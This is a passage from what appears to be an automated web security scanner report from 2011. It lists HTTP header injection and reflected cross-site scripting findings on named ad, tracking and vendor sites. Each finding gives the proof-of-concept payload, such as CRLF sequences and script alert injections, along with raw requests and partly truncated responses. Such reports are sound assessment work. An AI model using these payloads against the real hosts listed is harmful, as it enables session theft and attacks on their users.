HTTP/1.1 200 OK Date: Sun, 27 Feb 2011 02:33:28 GMT Server: Apache/1.3.37 (Unix) mod_perl/1.29 P3P: policyref="http://www P3P: policyref="http://www Cache-Control: max-age=900 Expires: Sun, 27 Feb 2011 02:48:28 GMT Set-Cookie: ATTACID=a3Z0aWQ9MTZs Set-Cookie: ANRTT=53615^1^1299284361 Set-Cookie: Tsid=0^1298774008 6420ebe94a^1298774008^1298775808; path=/; expires=Sun, 27-Feb-11 03:03:28 GMT; domain=tacoda.at.atwola Set-Cookie: TData=99999|^|53575|53656 Set-Cookie: Anxd=x; expires=Sun, 27-Feb-11 08:33:28 GMT; path=/; domain=tacoda.at.atwola Set-Cookie: N=2:ca3680f9be00bf67 Set-Cookie: ATTAC=a3ZzZWc9OTk5OT Cteonnt-Length: 176 Content-Type: application/x-javascript Content-Length: 176 var ANUT=1; var ANOO=0; var ANSR=1; var ANTID='16lsqii1n1a3cr'; var ANSL='99999|^|53575|53656 ANRTXR(); |
2.7. http://tags.crwdcntrl.net/5/c=25/b=1225394 [name of an arbitrarily supplied request parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://tags.crwdcntrl.net |
Path: | /5/c=25/b=1225394 |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload f335d%0d%0a6c92f1d82cf was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.Request
GET /5/c=25/b=1225394?f335d%0d%0a6c92f1d82cf=1 HTTP/1.1 Host: tags.crwdcntrl.net Proxy-Connection: keep-alive Referer: http://www.project Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: aud=ABR4nGNgYGDwzdxy |
Response
HTTP/1.1 302 Moved Temporarily Date: Sun, 27 Feb 2011 02:23:34 GMT Server: Apache/2.2.8 (CentOS) X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat Cache-Control: no-cache Expires: 0 Pragma: no-cache P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV Set-Cookie: aud=ABR4nGNgYGDwzdy6 Set-Cookie: cc=ACB4nGNQMEuzsLRIs Location: http://f335d 6c92f1d82cf=1 Vary: Accept-Encoding Connection: close Content-Type: text/plain; charset=UTF-8 Content-Length: 0 |
2.8. http://tags.crwdcntrl.net/5/c=25/b=1225400 [name of an arbitrarily supplied request parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://tags.crwdcntrl.net |
Path: | /5/c=25/b=1225400 |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 2f2f5%0d%0a3a2cc9ab32b was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.Request
GET /5/c=25/b=1225400?2f2f5%0d%0a3a2cc9ab32b=1 HTTP/1.1 Host: tags.crwdcntrl.net Proxy-Connection: keep-alive Referer: http://www.project Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: aud=ABR4nGNgYGDwzdxy |
Response
HTTP/1.1 302 Moved Temporarily Date: Sun, 27 Feb 2011 02:23:08 GMT Server: Apache/2.2.8 (CentOS) X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat Cache-Control: no-cache Expires: 0 Pragma: no-cache P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV Set-Cookie: aud=ABR4nGNgYGDwzdza Set-Cookie: cc=ACB4nGNQMEuzsLRIs Location: http://2f2f5 3a2cc9ab32b=1 Vary: Accept-Encoding Connection: close Content-Type: text/plain; charset=UTF-8 Content-Length: 0 |
2.9. http://tags.crwdcntrl.net/5/c=25/b=1226041 [name of an arbitrarily supplied request parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://tags.crwdcntrl.net |
Path: | /5/c=25/b=1226041 |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 2bdae%0d%0a32111a498f8 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.Request
GET /5/c=25/b=1226041?2bdae%0d%0a32111a498f8=1 HTTP/1.1 Host: tags.crwdcntrl.net Proxy-Connection: keep-alive Referer: http://www.project Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: aud=ABR4nGNgYGDwzdxy |
Response
HTTP/1.1 302 Moved Temporarily Date: Sun, 27 Feb 2011 02:23:36 GMT Server: Apache/2.2.8 (CentOS) X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat Cache-Control: no-cache Expires: 0 Pragma: no-cache P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV Set-Cookie: aud=ABR4nGNgYGDwzdy6 Set-Cookie: cc=ACB4nGNQMEuzsLRIs Location: http://2bdae 32111a498f8=1 Vary: Accept-Encoding Connection: close Content-Type: text/plain; charset=UTF-8 Content-Length: 0 |
3. Cross-site scripting (reflected) previous next
There are 91 instances of this issue:
- http://ads.tw.adsonar.com/adserving/getAds.jsp [pid parameter]
- http://ads.tw.adsonar.com/adserving/getAds.jsp [placementId parameter]
- http://ads.tw.adsonar.com/adserving/getAds.jsp [ps parameter]
- http://alterianwaserver.alterianconnect.net/tracking.aspx/gettoken/ [callback parameter]
- http://alterianwaserver.alterianconnect.net/tracking.aspx/submi
tevents/ [callback parameter] - http://alterianwaserver.alterianconnect.net/tracking.aspx/submi
tsession/ [callback parameter] - http://altfarm.mediaplex.com/ad/js/3992-121072-16279
-0 [mpt parameter] - http://altfarm.mediaplex.com/ad/js/3992-121072-16279
-0 [mpvc parameter] - http://altfarm.mediaplex.com/ad/js/3992-121072-16279
-0 [name of an arbitrarily supplied request parameter] - http://api.postup.com/TCTUL001/twidget/1.jsonp [jsonp parameter]
- http://apps.conduit-banners.com/TechCrunchApp-Techcrunch
_APP [imageurl parameter] - http://b.scorecardresearch.com/beacon.js [c1 parameter]
- http://b.scorecardresearch.com/beacon.js [c10 parameter]
- http://b.scorecardresearch.com/beacon.js [c15 parameter]
- http://b.scorecardresearch.com/beacon.js [c2 parameter]
- http://b.scorecardresearch.com/beacon.js [c3 parameter]
- http://b.scorecardresearch.com/beacon.js [c4 parameter]
- http://b.scorecardresearch.com/beacon.js [c5 parameter]
- http://b.scorecardresearch.com/beacon.js [c6 parameter]
- http://cdn.widgetserver.com/syndication/platform
/InsertWidget/fif/aol/id /8f8e2793-e99e-41bf-8b75 -95ef3e434575/__c__,wbx _at,http%3A%2F%2Fcdn4 .eyewonder.com%2Fcm%2Fnb %2F9826-119832-16279-2 %3Fmpt%3D%5Btimestamp%5D ,wbx_lp,http://at.atwola .com/adlink/5113/1838313 /0/529/AdId=1481436 [BnId parameter] - http://cdn.widgetserver.com/syndication/platform
/InsertWidget/fif/aol/id /8f8e2793-e99e-41bf-8b75 -95ef3e434575/__c__,wbx _at,http%3A%2F%2Fcdn4 .eyewonder.com%2Fcm%2Fnb %2F9826-119832-16279-2 %3Fmpt%3D%5Btimestamp%5D ,wbx_lp,http://at.atwola .com/adlink/5113/1838313 /0/529/AdId=1481436 [REST URL parameter 10] - http://cdn.widgetserver.com/syndication/platform
/InsertWidget/fif/aol/id /8f8e2793-e99e-41bf-8b75 -95ef3e434575/__c__,wbx _at,http%3A%2F%2Fcdn4 .eyewonder.com%2Fcm%2Fnb %2F9826-119832-16279-2 %3Fmpt%3D%5Btimestamp%5D ,wbx_lp,http://at.atwola .com/adlink/5113/1838313 /0/529/AdId=1481436 [REST URL parameter 11] - http://cdn.widgetserver.com/syndication/platform
/InsertWidget/fif/aol/id /8f8e2793-e99e-41bf-8b75 -95ef3e434575/__c__,wbx _at,http%3A%2F%2Fcdn4 .eyewonder.com%2Fcm%2Fnb %2F9826-119832-16279-2 %3Fmpt%3D%5Btimestamp%5D ,wbx_lp,http://at.atwola .com/adlink/5113/1838313 /0/529/AdId=1481436 [REST URL parameter 12] - http://cdn.widgetserver.com/syndication/platform
/InsertWidget/fif/aol/id /8f8e2793-e99e-41bf-8b75 -95ef3e434575/__c__,wbx _at,http%3A%2F%2Fcdn4 .eyewonder.com%2Fcm%2Fnb %2F9826-119832-16279-2 %3Fmpt%3D%5Btimestamp%5D ,wbx_lp,http://at.atwola .com/adlink/5113/1838313 /0/529/AdId=1481436 [REST URL parameter 13] - http://cdn.widgetserver.com/syndication/platform
/InsertWidget/fif/aol/id /8f8e2793-e99e-41bf-8b75 -95ef3e434575/__c__,wbx _at,http%3A%2F%2Fcdn4 .eyewonder.com%2Fcm%2Fnb %2F9826-119832-16279-2 %3Fmpt%3D%5Btimestamp%5D ,wbx_lp,http://at.atwola .com/adlink/5113/1838313 /0/529/AdId=1481436 [REST URL parameter 14] - http://cdn.widgetserver.com/syndication/platform
/InsertWidget/fif/aol/id /8f8e2793-e99e-41bf-8b75 -95ef3e434575/__c__,wbx _at,http%3A%2F%2Fcdn4 .eyewonder.com%2Fcm%2Fnb %2F9826-119832-16279-2 %3Fmpt%3D%5Btimestamp%5D ,wbx_lp,http://at.atwola .com/adlink/5113/1838313 /0/529/AdId=1481436 [REST URL parameter 15] - http://cdn.widgetserver.com/syndication/platform
/InsertWidget/fif/aol/id /8f8e2793-e99e-41bf-8b75 -95ef3e434575/__c__,wbx _at,http%3A%2F%2Fcdn4 .eyewonder.com%2Fcm%2Fnb %2F9826-119832-16279-2 %3Fmpt%3D%5Btimestamp%5D ,wbx_lp,http://at.atwola .com/adlink/5113/1838313 /0/529/AdId=1481436 [REST URL parameter 4] - http://cdn.widgetserver.com/syndication/platform
/InsertWidget/fif/aol/id /8f8e2793-e99e-41bf-8b75 -95ef3e434575/__c__,wbx _at,http%3A%2F%2Fcdn4 .eyewonder.com%2Fcm%2Fnb %2F9826-119832-16279-2 %3Fmpt%3D%5Btimestamp%5D ,wbx_lp,http://at.atwola .com/adlink/5113/1838313 /0/529/AdId=1481436 [REST URL parameter 5] - http://cdn.widgetserver.com/syndication/platform
/InsertWidget/fif/aol/id /8f8e2793-e99e-41bf-8b75 -95ef3e434575/__c__,wbx _at,http%3A%2F%2Fcdn4 .eyewonder.com%2Fcm%2Fnb %2F9826-119832-16279-2 %3Fmpt%3D%5Btimestamp%5D ,wbx_lp,http://at.atwola .com/adlink/5113/1838313 /0/529/AdId=1481436 [REST URL parameter 6] - http://cdn.widgetserver.com/syndication/platform
/InsertWidget/fif/aol/id /8f8e2793-e99e-41bf-8b75 -95ef3e434575/__c__,wbx _at,http%3A%2F%2Fcdn4 .eyewonder.com%2Fcm%2Fnb %2F9826-119832-16279-2 %3Fmpt%3D%5Btimestamp%5D ,wbx_lp,http://at.atwola .com/adlink/5113/1838313 /0/529/AdId=1481436 [REST URL parameter 7] - http://cdn.widgetserver.com/syndication/platform
/InsertWidget/fif/aol/id /8f8e2793-e99e-41bf-8b75 -95ef3e434575/__c__,wbx _at,http%3A%2F%2Fcdn4 .eyewonder.com%2Fcm%2Fnb %2F9826-119832-16279-2 %3Fmpt%3D%5Btimestamp%5D ,wbx_lp,http://at.atwola .com/adlink/5113/1838313 /0/529/AdId=1481436 [REST URL parameter 8] - http://cdn.widgetserver.com/syndication/platform
/InsertWidget/fif/aol/id /8f8e2793-e99e-41bf-8b75 -95ef3e434575/__c__,wbx _at,http%3A%2F%2Fcdn4 .eyewonder.com%2Fcm%2Fnb %2F9826-119832-16279-2 %3Fmpt%3D%5Btimestamp%5D ,wbx_lp,http://at.atwola .com/adlink/5113/1838313 /0/529/AdId=1481436 [REST URL parameter 9] - https://cds.sun.com/is-bin/INTERSHOP
.enfinity/WFS/CDS-CDS _Developer-Site/en_US/- /USD/ViewProductDetail -Start [name of an arbitrarily supplied request parameter] - https://client.trafficshaping.com/signin [email parameter]
- http://dean.edwards.name/weblog/2006/03/faster [REST URL parameter 1]
- http://dean.edwards.name/weblog/2006/03/faster [REST URL parameter 1]
- http://dean.edwards.name/weblog/2006/03/faster [REST URL parameter 4]
- http://dean.edwards.name/weblog/2006/06/again/ [REST URL parameter 1]
- http://dean.edwards.name/weblog/2006/06/again/ [REST URL parameter 1]
- http://dean.edwards.name/weblog/2006/06/again/ [REST URL parameter 4]
- http://dean.edwards.name/weblog/2006/06/again/ [name of an arbitrarily supplied request parameter]
- https://event.on24.com/eventRegistration
/EventLobbyServlet [key parameter] - https://event.on24.com/eventRegistration
/EventLobbyServlet [partnerref parameter] - https://event.on24.com/eventRegistration
/EventLobbyServlet [sourcepage parameter] - http://init.zopim.com/register [mID parameter]
- http://lfov.net/webrecorder/g/chimera.js [vid parameter]
- http://odb.outbrain.com/utils/get [callback parameter]
- https://shop.winamp.com/DRHM/store [name of an arbitrarily supplied request parameter]
- https://shop.winamp.com/store [name of an arbitrarily supplied request parameter]
- http://widgets.digg.com/buttons/count [url parameter]
- http://www.business-software.com/top-10-web-content
-management-vendors.php [gclid parameter] - http://www.business-software.com/top-10-web-content
-management-vendors.php [keyword parameter] - http://www.business-software.com/top-10-web-content
-management-vendors.php [name of an arbitrarily supplied request parameter] - http://www.business-software.com/top-10-web-content
-management-vendors.php [track parameter] - http://www.business-software.com/top-10-web-content
-management-vendors.php [traffic parameter] - http://www.linkedin.com/cws/share-count [url parameter]
- http://www.paperthin.com/_cs_apps/ajaxProxy.cfm [bean parameter]
- http://www.paperthin.com/_cs_apps/ajaxProxy.cfm [method parameter]
- http://www.prchecker.info/check_page_rank.php [name of an arbitrarily supplied request parameter]
- http://www.prchecker.info/check_page_rank.php [urlo parameter]
- http://www.sti-cs.com/Portfolio/Trades-and
-Exhibits/id-24/page-1/ [REST URL parameter 3] - http://www.sti-cs.com/Portfolio/Trades-and
-Exhibits/id-25/page-1/ [REST URL parameter 3] - http://www.sti-cs.com/Portfolio/Trades-and
-Exhibits/id-7/page-1/ [REST URL parameter 3] - http://www.watchmouse.com/assets/css/print.css [REST URL parameter 3]
- http://www.watchmouse.com/assets/css/screen.css [REST URL parameter 3]
- http://www.watchmouse.com/en/ [REST URL parameter 1]
- http://www.watchmouse.com/en/ [name of an arbitrarily supplied request parameter]
- http://www.watchmouse.com/en/api/checkreferrer.php [REST URL parameter 3]
- http://www.winamp.com/media-player/en [REST URL parameter 2]
- https://www14.software.ibm.com/webapp/iwm/web/signup.do [ck parameter]
- https://www14.software.ibm.com/webapp/iwm/web/signup.do [cm parameter]
- https://www14.software.ibm.com/webapp/iwm/web/signup.do [cmp parameter]
- https://www14.software.ibm.com/webapp/iwm/web/signup.do [cr parameter]
- https://www14.software.ibm.com/webapp/iwm/web/signup.do [csr parameter]
- https://www14.software.ibm.com/webapp/iwm/web/signup.do [ct parameter]
- https://www14.software.ibm.com/webapp/iwm/web/signup.do [mkwid parameter]
- https://www14.software.ibm.com/webapp/iwm/web/signup.do [name of an arbitrarily supplied request parameter]
- https://event.on24.com/eventRegistration
/EventLobbyServlet [User-Agent HTTP header] - https://login.oracle.com/mysso/signon.jsp [Referer HTTP header]
- https://login.oracle.com/pls/orasso/orasso.wwsso
_app_admin.ls_login [Referer HTTP header] - http://telligent.com/products/request_a_demo
.aspx [Referer HTTP header] - http://telligent.com/resources/m/analysts
/1343205.aspx [Referer HTTP header] - http://telligent.com/resources/m/analysts
/1345217.aspx [Referer HTTP header] - http://telligent.com/resources/m/success
_stories/1331597.aspx [Referer HTTP header] - http://telligent.com/support/request_an
_upgrade/ [Referer HTTP header] - http://www.watchmouse.com/en/ [Referer HTTP header]
- http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie]
- http://seg.sharethis.com/getSegment.php [__stid cookie]
- http://www.winamp.com/ [countryCookie cookie]
- http://www.winamp.com/media-player/en [countryCookie cookie]
- http://www.winamp.com/skin/slick-redux/222084 [countryCookie cookie]
Issue background
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
3.1. http://ads.tw.adsonar.com/adserving/getAds.jsp [pid parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://ads.tw.adsonar.com |
Path: | /adserving/getAds.jsp |
Issue detail
The value of the pid request parameter is copied into the HTML document as plain text between tags. The payload 5f6c7<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adserving/getAds.jsp Host: ads.tw.adsonar.com Proxy-Connection: keep-alive Referer: http://forums.winamp.com/ Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
Response
HTTP/1.1 200 OK Date: Sun, 27 Feb 2011 17:43:39 GMT Cache-Control: no-cache Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: policyref="http://ads Content-Type: text/html;charset=utf-8 Vary: Accept-Encoding,User Content-Length: 2510 <!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN"> <html> <head> <title>Ads by Quigo</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> ...[SNIP]... </script> java.lang.NumberForm </head> ...[SNIP]... |
3.2. http://ads.tw.adsonar.com/adserving/getAds.jsp [placementId parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://ads.tw.adsonar.com |
Path: | /adserving/getAds.jsp |
Issue detail
The value of the placementId request parameter is copied into an HTML comment. The payload ce49b--><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adserving/getAds.jsp Host: ads.tw.adsonar.com Proxy-Connection: keep-alive Referer: http://forums.winamp.com/ Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
Response
HTTP/1.1 200 OK Date: Sun, 27 Feb 2011 17:43:16 GMT Vary: Accept-Encoding,User Content-Type: text/plain Content-Length: 3257 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <body> <!-- java.lang.NumberForm ...[SNIP]... |
3.3. http://ads.tw.adsonar.com/adserving/getAds.jsp [ps parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://ads.tw.adsonar.com |
Path: | /adserving/getAds.jsp |
Issue detail
The value of the ps request parameter is copied into an HTML comment. The payload 78c7f--><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adserving/getAds.jsp Host: ads.tw.adsonar.com Proxy-Connection: keep-alive Referer: http://forums.winamp.com/ Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
Response
HTTP/1.1 200 OK Date: Sun, 27 Feb 2011 17:44:02 GMT Vary: Accept-Encoding,User Content-Type: text/plain Content-Length: 3696 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <body> <!-- java.lang.NumberForm ...[SNIP]... |
3.4. http://alterianwaserver.alterianconnect.net/tracking.aspx/gettoken/ [callback parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://alterianwaserver |
Path: | /tracking.aspx/gettoken/ |
Issue detail
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload e85e0<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tracking.aspx/gettoken/ Host: alterianwaserver Proxy-Connection: keep-alive Referer: http://webcontent Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
Response
HTTP/1.1 200 OK Cache-Control: private, max-age=0 Content-Type: application/json; charset=utf-8 Expires: Sat, 26 Feb 2011 23:20:10 GMT Last-Modified: Sat, 26 Feb 2011 23:20:10 GMT Server: Microsoft-IIS/7.5 X-AspNetMvc-Version: 2.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Sat, 26 Feb 2011 23:20:09 GMT Content-Length: 137 this.altTracker |
3.5. http://alterianwaserver.alterianconnect.net/tracking.aspx/submitevents/ [callback parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://alterianwaserver |
Path: | /tracking.aspx/submi |
Issue detail
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 2b978<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tracking.aspx/submi Host: alterianwaserver Proxy-Connection: keep-alive Referer: http://webcontent Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: application/json; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNetMvc-Version: 2.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Sat, 26 Feb 2011 23:20:31 GMT Content-Length: 90 this.altTracker |
3.6. http://alterianwaserver.alterianconnect.net/tracking.aspx/submitsession/ [callback parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://alterianwaserver |
Path: | /tracking.aspx/submi |
Issue detail
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload f4af1<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tracking.aspx/submi Host: alterianwaserver Proxy-Connection: keep-alive Referer: http://webcontent Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
Response
HTTP/1.1 200 OK Cache-Control: private, max-age=0 Content-Type: application/json; charset=utf-8 Expires: Sat, 26 Feb 2011 23:20:30 GMT Last-Modified: Sat, 26 Feb 2011 23:20:30 GMT Server: Microsoft-IIS/7.5 X-AspNetMvc-Version: 2.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Sat, 26 Feb 2011 23:20:29 GMT Content-Length: 212 this.altTracker |
3.7. http://altfarm.mediaplex.com/ad/js/3992-121072-16279-0 [mpt parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://altfarm.mediaplex |
Path: | /ad/js/3992-121072-16279 |
Issue detail
The value of the mpt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 55c54'-alert(1)-This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ad/js/3992-121072-16279 Host: altfarm.mediaplex.com Proxy-Connection: keep-alive Referer: http://techcrunch.com/wp Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: svid=879590159695; mojo3=12309:25586/1551 |
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: no-store Pragma: no-cache Expires: 0 Content-Type: text/html Content-Length: 527 Date: Sun, 27 Feb 2011 02:31:59 GMT document.write('<a target="_blank" href="http://at.atwola ...[SNIP]... |
3.8. http://altfarm.mediaplex.com/ad/js/3992-121072-16279-0 [mpvc parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://altfarm.mediaplex |
Path: | /ad/js/3992-121072-16279 |
Issue detail
The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 55d8a'%3balert(1)/This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ad/js/3992-121072-16279 Host: altfarm.mediaplex.com Proxy-Connection: keep-alive Referer: http://techcrunch.com/wp Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: svid=879590159695; mojo3=12309:25586/1551 |
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: no-store Pragma: no-cache Expires: 0 Content-Type: text/html Content-Length: 527 Date: Sun, 27 Feb 2011 02:32:18 GMT document.write('<a target="_blank" href="http://at.atwola ...[SNIP]... |
3.9. http://altfarm.mediaplex.com/ad/js/3992-121072-16279-0 [name of an arbitrarily supplied request parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://altfarm.mediaplex |
Path: | /ad/js/3992-121072-16279 |
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8535c'%3balert(1)/This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ad/js/3992-121072-16279 Host: altfarm.mediaplex.com Proxy-Connection: keep-alive Referer: http://techcrunch.com/wp Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: svid=879590159695; mojo3=12309:25586/1551 |
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: no-store Pragma: no-cache Expires: 0 Content-Type: text/html Content-Length: 530 Date: Sun, 27 Feb 2011 02:32:52 GMT document.write('<a target="_blank" href="http://at.atwola ...[SNIP]... |
3.10. http://api.postup.com/TCTUL001/twidget/1.jsonp [jsonp parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://api.postup.com |
Path: | /TCTUL001/twidget/1.jsonp |
Issue detail
The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload a5385<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /TCTUL001/twidget/1.jsonp Host: api.postup.com Proxy-Connection: keep-alive Referer: http://www.tweetup.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
Response
